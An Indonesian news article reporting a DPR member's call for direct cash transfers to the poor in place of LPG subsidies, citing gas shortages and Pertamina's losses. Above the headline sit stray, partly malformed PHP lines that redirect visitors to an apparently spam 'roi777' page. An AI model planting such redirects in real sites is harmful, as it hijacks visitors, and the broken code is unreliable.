header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); DPR Sebut Masyarakat Miskin Lebih Baik Diberi Subsidi Langsung -
DPR Sebut Masyarakat Miskin Lebih Baik Diberi Subsidi Langsung

TRANSLAMPUNG.COM, JAKARTA – Dewan Perwakilan Rakyat (DPR) meminta pemerintah memberikan subsidi langsung ke masyarakat miskin. Nantinya, subsidi ini diberikan dalam bentuk Bantuan Langsung Tunai (BLT).

Wakil Ketua Komisi VII DPR RI Satya Widya Yudha mengatakan pemberian subsidi kepada barang dinilai tidak efektif. Dia mencontohkan, terjadinya kelangkaan gas elpiji beberapa waktu lalu bisa menjadi bukti subsidi barang tidak tepat sasaran.

“Dengan subsidi yang diberikan langsung kepada masyarakat, maka sudah tidak perlu lagi distribusi terbuka atau tertutup. Kita hanya fokus pada masyarakat yang membutuhkan agar tepat sasaran,” kata Satya usai acara HUT Pertamina ke-60 di Raffles Hotel, Jakarta, Selasa (12/12).

Dia menegaskan, pemerintah bisa meminta bantuan Tim Nasional Percepatan Penanggulangan Kemiskinan (TNP2K). Menurutnya, pola distribusi tertutup yang diterapkan dalam elpiji subsidi juga tidak efektif.

“Hal ini akan lebih hemat bila dibandingkan dengan yang sekarang menggunakan pola distribusi tertutup yang tak kunjung selesai, pengawasannya sulit, dan mungkin akan dilaksanakan dua tahun lagi. Akibatnya, muncul kelangkaan elpiji,” tuturnya.

Dia menambahkan nantinya masyarakat miskin sesuai dengan data TNP2K akan mendapatkan kartu. Kartu ini bisa menjadi patokan pemerintah dalam memberikan BLT.

Lebih lanjut, Satya menjelaskan Pertamina juga harus menanggung beban jika subsidi elpiji membengkak. Saat ini, pihak Pertamina pun mengaku sudah nombok Rp 1 triliun untuk menambah kuota gas elpiji subsidi.

“Pertamina tidak mau rugi, sehingga menambah beban. Hal itu menurut saya kecerobohan pemerintahan,” jelasnya. (jpg/hkw)

News Reporter